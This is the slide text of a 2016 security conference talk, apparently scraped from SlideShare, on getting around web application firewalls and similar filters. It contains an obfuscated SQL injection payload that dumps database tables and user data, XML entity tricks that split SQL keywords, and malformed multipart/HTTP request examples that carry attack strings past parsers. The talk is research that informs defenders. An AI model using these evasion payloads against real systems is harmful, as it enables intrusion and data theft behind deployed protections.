Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

1,912 views

Published on

There are regular and smart firewalls. The regular ones are quite clear, it was a good report on the latest Black Hat. However, we need a completely different approach to come round advanced protection.


Есть фаерволы на регулярных выражениях, а есть умные. Если с первыми все понятно — был отличный доклад на последнем Black Hat, то чтобы обойти современную защиту, нужно иметь совершенно другой подход!

Published in: Technology
  • Be the first to comment

Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже пояса. Обход современных WAF/IPS/DLP

  1. 1. ZeroNights 2016
  2. 2. Whoami Anton “Bo0oM” Lopanitsyn ● security researcher ● whitehat ● bug bounty practicant ● JBFC member
  3. 3. Types of bypasses Protocol parsing (HTTP, WS, ...) Data parsers (Base64, XML, JSON, ...) Detection logic
  4. 4. Detection logic, bla-bla-bla 1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)li ke'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from (@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53) ,0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))- cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))- floor(pi()))),0x6d7973716c))from(select-- (select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00 Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`use r`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
  5. 5. Data parsers <?xml version="1.0" encoding="utf-8"?> <bla></bla> <data>&lt;?xml version="1.0" encoding="utf- 8"&gt;&lt;!ENTITY XXE Attack&gt;&lt;bla&gt;&lt;/bla&gt;</data> <bla></bla>
  6. 6. Data parsers <?xml version="1.0" encoding="UTF-8"?> <!ENTITY a "UNI"> <!ENTITY b "SELE"> <!ENTITY c "pass"> <!ENTITY d "FR"> <!ENTITY e "admins"> <!ENTITY f "WHE"> <authorid>-1 OR &a;ON &b;CT &c;wd &d;OM &e; &f;RE id=1</authorid>
  7. 7. HTTP requests & HTTP parsers
  8. 8. Content-type: multipart/form-data, boundary=AaB03x --AaB03x content-disposition: form-data; name="field1" Joe Blow --AaB03x content-disposition: form-data; name="pics"; filename="file1.txt" Content-Type: text/plain ... contents of file1.txt ... --AaB03x-- Multipart
  9. 9. POST /hello HTTP/1.1 Content-Type: application/x-www-form-urlencoded param=Attack POST /hello HTTP/1.1 Content-type: multipart/form-data, boundary=AaB03x --AaB03x content-disposition: form-data; name="param" Attack
  10. 10. Content-Disposition: form-data; name="param"text"text"'test'; Content-Disposition: form-data; name=”param Content-Disposition: form-data; name=param Content-Disposition: attachment; name=param Content-Disposition: name=param Content-disposition trick
  11. 11. Content-Disposition: attachment; name = param Attack! Content-Disposition tricks
  12. 12. POST / HTTP/1.1 Content-Type: multipart/form-data; boundary Content-Type: multipart/form-data; boundary=Test Content-Type: multipart/form-data; boundary --Test Content-Disposition: form-data; name=param Attack Headers tricks
  13. 13. POST / HTTP/1.1 Content-Type: multipart/form-data; boundary Content-Type: multipart/form-data; boundary= Content-Type: multipart/form-data; boundary -- Content-Disposition: form-data; name=param Attack Headers tricks
  14. 14. Headers tricks. RFC? What is RFC? POST / HTTP/1.1 Content-Type: multipart/form-data; xxxboundaryxxx=Test; boundary=hello; --Test Content-Disposition: form-data; name=param Attack
  15. 15. Content-Type: multipart/form-data; boundary=gg Content-Type: multipart/form-data; boundary=ggg Content-Type: multipart/form-data; boundary=gg Content-Type: multipart/form-data; boundary=ggg Content-Type: multipart/form-data; boundary=ggg Content-Type: multipart/form-data; boundary=!ggg
  16. 16. Content-Encoding: gzip HTTP compression Previous tricks ;)
  17. 17. PHP + %00
  18. 18. PHP <3 POST /phpmustdie.php HTTP/1.1 Content-Type: multipart/form-data; boundary=Testx00othertext; --Test Content-Disposition: form-data; name=param Attack
  19. 19. PHP <3 POST /phpmustdie.php HTTP/1.1 Content-Type: multipart/form-data; boundary=Test; --Testx00othertext Content-Disposition: form-data; name=param Attack
  20. 20. PHP <3 POST /phpmustdie.php HTTP/1.1 Content-Type: multipart/form-data; boundary=Test; --Test Content-Disposition: form-data; name=param Attackx00othertext
  21. 21. POST /hello HTTP/1.1 Foo: bar Foo: bar ... Foo: bar Foo: bar Content-Type: application/x-www-form-urlencoded param=Attack
  22. 22. POST /hello HTTP/1.1 Content-Type: application/x-www-form-urlencoded param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A*(8kb)’ union select from ...
  23. 23. Anton “Bo0oM” Lopanitsyn https://bo0om.ru i@bo0om.ru @i_bo0om

×